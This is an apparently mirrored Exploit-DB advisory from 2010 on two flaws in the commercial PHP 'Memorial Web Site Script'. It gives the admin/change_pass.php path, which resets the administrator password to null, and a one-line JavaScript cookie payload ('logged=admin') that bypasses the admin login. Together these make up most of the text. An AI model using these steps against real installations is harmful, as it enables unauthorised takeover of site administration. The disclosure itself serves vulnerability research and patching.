Memorial Web Site Script – Reset Password / Insecure Cookie Handling - 体验盒子

作者： Chip d3 bi0s

日期： 2010-04-23

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/12358/

-----------------------------------------------------------------------
Memorial Web Site Script --> Reset Password & Insecure Cookie Handling
----------------------------------------------------------------------- 
Author	: Chip D3 Bi0s
Email	: chipdebios[alt+64]gmail.com
Where	: From Remote
Group	: LatinHackTeam


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application	: Memorial Web Site Script
Author		: Easy Scripts
Price		: $49
Vendor		: http://www.easy-scripts.net

description Bug:
~~~~~~~~~~~~~~~

To reset the password just use this:

http://127.0.0.1/[path]/admin/change_pass.php

so the password will be null, login with single user can
admin:

http://127.0.0.1/[path]/admin/

--------------------------

Insecure Cookie Handling

exploit:
javascript:document.cookie="logged=admin;path=/";

http://127.0.0.1/[path]/admin/
--------------------------



+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++